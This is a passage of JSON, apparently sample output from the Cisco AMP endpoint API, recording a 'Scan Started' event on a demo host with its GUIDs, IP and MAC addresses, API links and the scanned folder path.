      "timestamp": 1620252408,
      "timestamp_nanoseconds": 193000000,
      "date": "2021-05-05T22:06:48+00:00",
      "event_type": "Scan Started",
      "event_type_id": 554696714,
      "connector_guid": "8f65c48e-e166-485e-9f0b-67460b99fa50",
      "group_guids": [
        "af1e7d79-880b-4aaf-84d4-06149fef0cd2",
        "8f6c4774-0e8e-4546-8ebd-4e1b035473b4"
      ],
      "computer": {
        "connector_guid": "8f65c48e-e166-485e-9f0b-67460b99fa50",
        "hostname": "Demo_ZAccess",
        "external_ip": "129.92.41.205",
        "active": true,
        "network_addresses": [
          {
            "ip": "159.125.227.38",
            "mac": "bf:bc:e4:c9:d7:f1"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/8f65c48e-e166-485e-9f0b-67460b99fa50",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/8f65c48e-e166-485e-9f0b-67460b99fa50/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "scan": {
        "description": "C:\\Program Files\\Microsoft Games"
      }
    }
  ]
}